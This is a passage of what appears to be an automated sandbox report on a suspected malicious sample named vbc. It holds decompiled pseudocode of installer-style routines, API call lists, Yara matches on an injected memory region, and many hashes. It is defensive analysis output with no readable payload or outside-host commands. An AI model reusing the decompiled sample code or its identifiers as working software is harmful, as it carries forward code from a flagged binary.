                                                								if(0 == 0x42b238) {
                                                									goto L30;
                                                								} else {
                                                									goto L26;
                                                								}
                                                								while(1) {
                                                									L26:
                                                									_t114 = _v16(0x42b238,  &_v48,  &_v28,  &_v40);
                                                									if(_t114 != 0) {
                                                										break;
                                                									}
                                                									if(_t159 != 0) {
                                                										 *_t159 =  *_t159 & _t114;
                                                									}
                                                									_t160 = E00405E58(0x42b238);
                                                									 *_t160 =  *_t160 & 0x00000000;
                                                									_t159 = _t160;
                                                									 *_t159 = 0x5c;
                                                									if(_t159 != 0x42b238) {
                                                										continue;
                                                									} else {
                                                										goto L30;
                                                									}
                                                								}
                                                								_t150 = _v44;
                                                								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                								_v44 = _t150 >> 0xa;
                                                								_v12 = 1;
                                                								_t158 = 0;
                                                								__eflags = 0;
                                                								L35:
                                                								_t169 = 0x400;
                                                								L36:
                                                								_t95 = E00404E27(5);
                                                								if(_v12 != _t158) {
                                                									_t197 = _v44;
                                                									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                										_v8 = 2;
                                                									}
                                                								}
                                                								if( *((intOrPtr*)( *0x433edc + 0x10)) != _t158) {
                                                									E00404E0F(0x3ff, 0xfffffffb, _t95);
                                                									if(_v12 == _t158) {
                                                										SetDlgItemTextW(_a4, _t169, 0x42b228);
                                                									} else {
                                                										E00404D46(_t169, 0xfffffffc, _v48, _v44);
                                                									}
                                                								}
                                                								_t96 = _v8;
                                                								 *0x434fa4 = _t96;
                                                								if(_t96 == _t158) {
                                                									_v8 = E0040140B(7);
                                                								}
                                                								if(( *(_v32 + 0x14) & _t169) != 0) {
                                                									_v8 = _t158;
                                                								}
                                                								E004044BB(0 | _v8 == _t158);
                                                								if(_v8 == _t158 &&  *0x42d258 == _t158) {
                                                									E004048E3();
                                                								}
                                                								 *0x42d258 = _t158;
                                                								goto L53;
                                                							}
                                                						}
                                                						_t186 = _a8 - 0x405;
                                                						if(_a8 != 0x405) {
                                                							goto L53;
                                                						}
                                                						goto L22;
                                                					}
                                                					_t118 = _a12 & 0x0000ffff;
                                                					if(_t118 != 0x3fb) {
                                                						L12:
                                                						if(_t118 == 0x3e9) {
                                                							_t152 = 7;
                                                							memset( &_v76, 0, _t152 << 2);
                                                							_v80 = _t167;
                                                							_v72 = 0x42d268;
                                                							_v60 = E00404CE0;
                                                							_v56 = _t146;
                                                							_v68 = E0040657A(_t146, 0x42d268, _t167, 0x42ba40, _v12);
                                                							_t122 =  &_v80;
                                                							_v64 = 0x41;
                                                							__imp__SHBrowseForFolderW(_t122);
                                                							if(_t122 == 0) {
                                                								_a8 = 0x40f;
                                                							} else {
                                                								__imp__CoTaskMemFree(_t122);
                                                								E00405E0C(_t146);
                                                								_t125 =  *((intOrPtr*)( *0x434f10 + 0x11c));
                                                								if( *((intOrPtr*)( *0x434f10 + 0x11c)) != 0 && _t146 == 0x440800) {
                                                									E0040657A(_t146, 0x42d268, _t167, 0, _t125);
                                                									if(lstrcmpiW(0x432ea0, 0x42d268) != 0) {
                                                										lstrcatW(_t146, 0x432ea0);
                                                									}
                                                								}
                                                								 *0x42d258 =  *0x42d258 + 1;
                                                								SetDlgItemTextW(_t167, 0x3fb, _t146);
                                                							}
                                                						}
                                                						goto L20;
                                                					}
                                                					if(_a12 >> 0x10 != 0x300) {
                                                						goto L53;
                                                					}
                                                					_a8 = 0x40f;
                                                					goto L12;
                                                				} else {
                                                					_t166 = GetDlgItem(_t167, 0x3fb);
                                                					if(E00405E83(_t146) != 0 && E00405EB7(_t146) == 0) {
                                                						E00405E0C(_t146);
                                                					}
                                                					 *0x433ed8 = _t167;
                                                					SetWindowTextW(_t166, _t146);
                                                					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                					_push(1);
                                                					E00404499(_t167);
                                                					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                					_push(0x14);
                                                					E00404499(_t167);
                                                					E004044CE(_t166);
                                                					_t138 = E0040690A(8);
                                                					if(_t138 == 0) {
                                                						L53:
                                                						return E00404500(_a8, _a12, _a16);
                                                					} else {
                                                						 *_t138(_t166, 1);
                                                						goto L8;
                                                					}
                                                				}
                                                			}













































                                                0x0040498a
                                                0x00404990
                                                0x00404996
                                                0x0040499a
                                                0x0040499d
                                                0x004049a3
                                                0x004049b1
                                                0x004049b4
                                                0x004049bc
                                                0x004049c2
                                                0x004049c2
                                                0x004049ce
                                                0x004049d1
                                                0x00404a3f
                                                0x00404a46
                                                0x00404b1d
                                                0x00404b24
                                                0x00404b33
                                                0x00404b33
                                                0x00404b37
                                                0x00404b41
                                                0x00404b4e
                                                0x00404b50
                                                0x00404b50
                                                0x00404b5e
                                                0x00404b65
                                                0x00404b6c
                                                0x00404b6f
                                                0x00404bab
                                                0x00404bad
                                                0x00404bb3
                                                0x00404bb8
                                                0x00404bbc
                                                0x00404bbe
                                                0x00404bbe
                                                0x00404bda
                                                0x00000000
                                                0x00404bdc
                                                0x00404bdf
                                                0x00404bed
                                                0x00404bf3
                                                0x00404bf4
                                                0x00404bf7
                                                0x00404bfa
                                                0x00000000
                                                0x00404bfa
                                                0x00404b71
                                                0x00404b73
                                                0x00404b77
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b79
                                                0x00404b79
                                                0x00404b86
                                                0x00404b8b
                                                0x00000000
                                                0x00000000
                                                0x00404b8f
                                                0x00404b91
                                                0x00404b91
                                                0x00404b9a
                                                0x00404b9c
                                                0x00404ba1
                                                0x00404ba4
                                                0x00404ba9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404ba9
                                                0x00404c06
                                                0x00404c10
                                                0x00404c13
                                                0x00404c16
                                                0x00404c1d
                                                0x00404c1d
                                                0x00404c1f
                                                0x00404c1f
                                                0x00404c24
                                                0x00404c26
                                                0x00404c2e
                                                0x00404c35
                                                0x00404c37
                                                0x00404c42
                                                0x00404c42
                                                0x00404c37
                                                0x00404c52
                                                0x00404c5c
                                                0x00404c64
                                                0x00404c7f
                                                0x00404c66
                                                0x00404c6f
                                                0x00404c6f
                                                0x00404c64
                                                0x00404c84
                                                0x00404c89
                                                0x00404c8e
                                                0x00404c97
                                                0x00404c97
                                                0x00404ca0
                                                0x00404ca2
                                                0x00404ca2
                                                0x00404cae
                                                0x00404cb6
                                                0x00404cc0
                                                0x00404cc0
                                                0x00404cc5
                                                0x00000000
                                                0x00404cc5
                                                0x00404b6f
                                                0x00404b26
                                                0x00404b2d
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00404b2d
                                                0x00404a4c
                                                0x00404a55
                                                0x00404a6f
                                                0x00404a74
                                                0x00404a7e
                                                0x00404a85
                                                0x00404a91
                                                0x00404a94
                                                0x00404a97
                                                0x00404a9e
                                                0x00404aa6
                                                0x00404aa9
                                                0x00404aad
                                                0x00404ab4
                                                0x00404abc
                                                0x00404b16
                                                0x00404abe
                                                0x00404abf
                                                0x00404ac6
                                                0x00404ad0
                                                0x00404ad8
                                                0x00404ae5
                                                0x00404af9
                                                0x00404afd
                                                0x00404afd
                                                0x00404af9
                                                0x00404b02
                                                0x00404b0f
                                                0x00404b0f
                                                0x00404abc
                                                0x00000000
                                                0x00404a74
                                                0x00404a62
                                                0x00000000
                                                0x00000000
                                                0x00404a68
                                                0x00000000
                                                0x004049d3
                                                0x004049e0
                                                0x004049e9
                                                0x004049f6
                                                0x004049f6
                                                0x004049fd
                                                0x00404a03
                                                0x00404a0c
                                                0x00404a0f
                                                0x00404a12
                                                0x00404a1a
                                                0x00404a1d
                                                0x00404a20
                                                0x00404a26
                                                0x00404a2d
                                                0x00404a34
                                                0x00404ccb
                                                0x00404cdd
                                                0x00404a3a
                                                0x00404a3d
                                                0x00000000
                                                0x00404a3d
                                                0x00404a34

                                                APIs
                                                • GetDlgItem.USER32(?,000003FB), ref: 004049D9
                                                • SetWindowTextW.USER32 ref: 00404A03
                                                • SHBrowseForFolderW.SHELL32(?), ref: 00404AB4
                                                • CoTaskMemFree.OLE32(00000000), ref: 00404ABF
                                                • lstrcmpiW.KERNEL32(Call,0042D268,00000000,?,-00436000), ref: 00404AF1
                                                • lstrcatW.KERNEL32 ref: 00404AFD
                                                • SetDlgItemTextW.USER32 ref: 00404B0F
                                                  • Part of subcall function 00405B81: GetDlgItemTextW.USER32 ref: 00405B94
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406827
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 00406836
                                                  • Part of subcall function 004067C4: CharNextW.USER32(?), ref: 0040683B
                                                  • Part of subcall function 004067C4: CharPrevW.USER32(?,?), ref: 0040684E
                                                • GetDiskFreeSpaceW.KERNEL32(0042B238,?,?,0000040F,?,0042B238,0042B238,-00436000,00000001,0042B238,-00436000,-00436000,000003FB,-00436000), ref: 00404BD2
                                                • MulDiv.KERNEL32 ref: 00404BED
                                                  • Part of subcall function 00404D46: lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404DE7
                                                  • Part of subcall function 00404D46: wsprintfW.USER32 ref: 00404DF0
                                                  • Part of subcall function 00404D46: SetDlgItemTextW.USER32 ref: 00404E03
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$Call
                                                • API String ID: 2624150263-209694386
                                                • Opcode ID: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction ID: a81e8b8b6ddc8ea4f7a7a45a10ce21cc850824e22f7b82fba9ad49fead82d7d1
                                                • Opcode Fuzzy Hash: 259166ff03eae0857acd79a20f7b98923a8009c2c5ceed70d4eafac61dfc2b3f
                                                • Instruction Fuzzy Hash: CBA191B1900208ABDB119FA6DD45AAFB7B8EF84314F10803BF601B62D1D77C9A41CB6D
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1t($8qaN$EHC($J"R$hy{d$p[1G$t{z
                                                • API String ID: 0-1583444602
                                                • Opcode ID: 141ef2828880df74eef53f8fcbf04790a034a219c49a5d9bee243e81a1ae59b0
                                                • Instruction ID: 1f4bf9e7181e895ffa52af0bbdc85f22f3b8fb29a5de7bb51577c8365e7539ba
                                                • Opcode Fuzzy Hash: 141ef2828880df74eef53f8fcbf04790a034a219c49a5d9bee243e81a1ae59b0
                                                • Instruction Fuzzy Hash: 97B202716083899FDF34DF38DC987DABBA2BF56310F49826ADC899B255C3304A41CB52
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID: 1t($8qaN$EHC($t{z
                                                • API String ID: 2167126740-1518202417
                                                • Opcode ID: ae2d8a17190248f6c95c06a3ab433b74f22e9282f3df8f7ea028a5edb7f367a4
                                                • Instruction ID: 265e7bd2ec9abc7f0759a425a505b14d08e5bbdb5f748132cf554e506b4b866e
                                                • Opcode Fuzzy Hash: ae2d8a17190248f6c95c06a3ab433b74f22e9282f3df8f7ea028a5edb7f367a4
                                                • Instruction Fuzzy Hash: 0072BDB26043899FDF74DF25DD857DABBB6FF59310F55822ADC899B210C3305A828B41
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: 1t($8qaN$EHC($t{z
                                                • API String ID: 0-1518202417
                                                • Opcode ID: 71c984391edea0196c1ac7763db2bcd4086f55da743c762c923612ac0f3e24b2
                                                • Instruction ID: 989605675106be980f955a28cb2af2c53bfe1be49675296c1001bb7aab4ef82c
                                                • Opcode Fuzzy Hash: 71c984391edea0196c1ac7763db2bcd4086f55da743c762c923612ac0f3e24b2
                                                • Instruction Fuzzy Hash: 8042DDB26043899FDB74DF35DD857DABBB6FF59310F55822ADC899B210C3305A828B81
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: ?t|)$`
                                                • API String ID: 0-1336213114
                                                • Opcode ID: bc6f7f978e2e5d22f22b889bd7cefc61671ef5d4b19d70ff0acb579584d92b35
                                                • Instruction ID: 0c8e3495f9fe31f1da699ddfb3682a43f22aef4754d7cb6615d77ddbd215fc2d
                                                • Opcode Fuzzy Hash: bc6f7f978e2e5d22f22b889bd7cefc61671ef5d4b19d70ff0acb579584d92b35
                                                • Instruction Fuzzy Hash: 4E21F5B66043988BFF39DE79E8993DE32A2BF59360F94826FCD0D9E145E73005818B51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 67%
                                                			E004021AA(void* __eflags) {
                                                				signed int _t52;
                                                				void* _t56;
                                                				intOrPtr* _t60;
                                                				intOrPtr _t61;
                                                				intOrPtr* _t62;
                                                				intOrPtr* _t64;
                                                				intOrPtr* _t66;
                                                				intOrPtr* _t68;
                                                				intOrPtr* _t70;
                                                				intOrPtr* _t72;
                                                				intOrPtr* _t74;
                                                				intOrPtr* _t76;
                                                				intOrPtr* _t78;
                                                				intOrPtr* _t80;
                                                				void* _t83;
                                                				intOrPtr* _t91;
                                                				signed int _t101;
                                                				signed int _t105;
                                                				void* _t107;
                                                
                                                				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                                                				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                                                				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                                                				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                                                				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                                                				_t52 =  *(_t107 - 0x20);
                                                				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                                                				_t101 = _t52 & 0x00008000;
                                                				_t105 = _t52 >> 0x0000000c & 0x00000007;
                                                				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                                                				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                                                					E00402DA6(0x21);
                                                				}
                                                				_t56 = _t107 + 8;
                                                				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
                                                				if(_t56 < _t83) {
                                                					L14:
                                                					 *((intOrPtr*)(_t107 - 4)) = 1;
                                                					_push(0xfffffff0);
                                                				} else {
                                                					_t60 =  *((intOrPtr*)(_t107 + 8));
                                                					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
                                                					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                                                					if(_t61 >= _t83) {
                                                						_t64 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                                                						if(_t101 == _t83) {
                                                							_t80 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
                                                						}
                                                						if(_t105 != _t83) {
                                                							_t78 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                                                						}
                                                						_t66 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                                                						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                                                						if( *_t91 != _t83) {
                                                							_t76 =  *((intOrPtr*)(_t107 + 8));
                                                							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                                                						}
                                                						_t68 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                                                						_t70 =  *((intOrPtr*)(_t107 + 8));
                                                						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                                                						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                                                							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                                                						}
                                                						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                                                						 *((intOrPtr*)( *_t72 + 8))(_t72);
                                                					}
                                                					_t62 =  *((intOrPtr*)(_t107 + 8));
                                                					 *((intOrPtr*)( *_t62 + 8))(_t62);
                                                					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                                                						_push(0xfffffff4);
                                                					} else {
                                                						goto L14;
                                                					}
                                                				}
                                                				E00401423();
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
                                                				return 0;
                                                			}






















                                                0x004021b3
                                                0x004021bd
                                                0x004021c7
                                                0x004021d1
                                                0x004021dc
                                                0x004021df
                                                0x004021f9
                                                0x004021fc
                                                0x00402202
                                                0x00402205
                                                0x0040220f
                                                0x00402213
                                                0x00402213
                                                0x00402218
                                                0x00402229
                                                0x00402231
                                                0x004022e8
                                                0x004022e8
                                                0x004022ef
                                                0x00402237
                                                0x00402237
                                                0x00402246
                                                0x0040224a
                                                0x0040224d
                                                0x00402253
                                                0x00402261
                                                0x00402264
                                                0x00402266
                                                0x00402271
                                                0x00402271
                                                0x00402276
                                                0x00402278
                                                0x0040227f
                                                0x0040227f
                                                0x00402282
                                                0x0040228b
                                                0x0040228e
                                                0x00402294
                                                0x00402296
                                                0x004022a0
                                                0x004022a0
                                                0x004022a3
                                                0x004022ac
                                                0x004022af
                                                0x004022b8
                                                0x004022be
                                                0x004022c0
                                                0x004022ce
                                                0x004022ce
                                                0x004022d1
                                                0x004022d7
                                                0x004022d7
                                                0x004022da
                                                0x004022e0
                                                0x004022e6
                                                0x004022fb
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x004022e6
                                                0x004022f1
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?), ref: 00402229
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: CreateInstance
                                                • String ID:
                                                • API String ID: 542301482-0
                                                • Opcode ID: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                • Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
                                                • Opcode Fuzzy Hash: 58fea544f8465b7ca695cd277db4a94267474b575ac50a9b019070cedb53bd32
                                                • Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 39%
                                                			E0040290B(short __ebx, short* __edi) {
                                                				void* _t21;
                                                
                                                				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                                                					E00406484( *((intOrPtr*)(_t21 - 0xc)), _t8);
                                                					_push(_t21 - 0x2b0);
                                                					_push(__edi);
                                                					E0040653D();
                                                				} else {
                                                					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                                                					 *__edi = __ebx;
                                                					 *((intOrPtr*)(_t21 - 4)) = 1;
                                                				}
                                                				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t21 - 4));
                                                				return 0;
                                                			}




                                                0x00402923
                                                0x0040293e
                                                0x00402949
                                                0x0040294a
                                                0x00402a94
                                                0x00402925
                                                0x00402928
                                                0x0040292b
                                                0x0040292e
                                                0x0040292e
                                                0x00402c2d
                                                0x00402c39

                                                APIs
                                                • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.687854101.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.687851142.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687859110.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687862814.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687875950.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687891941.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687919476.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000003.00000002.687924807.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_vbc.jbxd
                                                Similarity
                                                • API ID: FileFindFirst
                                                • String ID:
                                                • API String ID: 1974802433-0
                                                • Opcode ID: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                • Instruction ID: 3f6fbcf0fd4d311cdd608d5f72697756ed96b8559223cd5d9f1c4d92bc61f1b3
                                                • Opcode Fuzzy Hash: e3c555fdbd57f1008fac0fd93a6eb0fb110785489bc5405dabc14b2674c5a242
                                                • Instruction Fuzzy Hash: 3CF08271A04105EFD701DBA4ED49AAEB378FF14314F60417BE116F21D0E7B88E159B29
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: &r,E
                                                • API String ID: 0-3438234993
                                                • Opcode ID: db9c0a553eeaef294d14956ebfa76605cc1e373ce85aacd643507caccfad0d0e
                                                • Instruction ID: 7060225183a73938fe1f46517098f94e9f7318b607dab504feee003f6256b5a4
                                                • Opcode Fuzzy Hash: db9c0a553eeaef294d14956ebfa76605cc1e373ce85aacd643507caccfad0d0e
                                                • Instruction Fuzzy Hash: B1B1BD7164038ADFEF35DF24CC84BDE37A6BF55300F45862ADD4AAB254E7318A818B12
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: hy{d
                                                • API String ID: 0-48387667
                                                • Opcode ID: 64bb01b6fbd031a8a0f56fcc5e49238406e68d07892bae608872c9acac177ec3
                                                • Instruction ID: 20be30636afff74fe688b3ec2219b3713f7a7ae64109ca5fb49e8c1c43d60d2e
                                                • Opcode Fuzzy Hash: 64bb01b6fbd031a8a0f56fcc5e49238406e68d07892bae608872c9acac177ec3
                                                • Instruction Fuzzy Hash: 48B1D2615083C58EDB35CF38989CB9A7FA1AF52320F5983EAC8998F2D6D3358542C716
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.688715798.0000000003790000.00000040.00000800.00020000.00000000.sdmp, Offset: 03790000, based on PE: false
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_3790000_vbc.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: hy{d
                                                • API String ID: 0-48387667
                                                • Opcode ID: 4de66c49ddde163c653628ccae35de11a51555130fde50a7554d6ea68e9e553f
                                                • Instruction ID: c0c37a0f6e11bb2a9ac57b8e490fa744a5186da8b0f73337908b4d3abb0166d1
                                                • Opcode Fuzzy Hash: 4de66c49ddde163c653628ccae35de11a51555130fde50a7554d6ea68e9e553f
                                                • Instruction Fuzzy Hash: A941C5729042C48BDF39CF349C987E97BA1EF51360F4982AEC8994F385D3344641C726
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E00406D85(signed int __ebx, signed int* __esi) {
                                                				signed int _t396;
                                                				signed int _t425;
                                                				signed int _t442;
                                                				signed int _t443;
                                                				signed int* _t446;
                                                				void* _t448;
                                                
                                                				L0:
                                                				while(1) {
                                                					L0:
                                                					_t446 = __esi;
                                                					_t425 = __ebx;
                                                					if( *(_t448 - 0x34) == 0) {
                                                						break;
                                                					}
                                                					L55:
                                                					__eax =  *(__ebp - 0x38);
                                                					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
                                                					__ecx = __ebx;
                                                					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
                                                					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
                                                					__ebx = __ebx + 8;
                                                					while(1) {
                                                						L56:
                                                						if(__ebx < 0xe) {
                                                							goto L0;
                                                						}
                                                						L57:
                                                						__eax =  *(__ebp - 0x40);
                                                						__eax =  *(__ebp - 0x40) & 0x00003fff;
                                                						__ecx = __eax;
                                                						__esi[1] = __eax;
                                                						__ecx = __eax & 0x0000001f;
                                                						if(__cl > 0x1d) {
                                                							L9:
                                                							_t443 = _t442 | 0xffffffff;
                                                							 *_t446 = 0x11;
                                                							L10:
                                                							_t446[0x147] =  *(_t448 - 0x40);
                                                							_t446[0x146] = _t425;
                                                							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
                                                							L11:
                                                							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
                                                							_t446[0x26ea] =  *(_t448 - 0x30);
                                                							E004074F4( *(_t448 + 8));
                                                							return _t443;
                                                						}
                                                						L58:
                                                						__eax = __eax & 0x000003e0;
                                                						if(__eax > 0x3a0) {
                                                							goto L9;
                                                						}
                                                						L59:
                                                						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
                                                						__ebx = __ebx - 0xe;
                                                						_t94 =  &(__esi[2]);
                                                						 *_t94 = __esi[2] & 0x00000000;
                                                						 *__esi = 0xc;
                                                						while(1) {
                                                							L60:
                                                							__esi[1] = __esi[1] >> 0xa;
                                                							__eax = (__esi[1] >> 0xa) + 4;
                                                							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
                                                								goto L68;
                                                							}
                                                							L61:
                                                							while(1) {
                                                								L64:
                                                								if(__ebx >= 3) {
                                                									break;
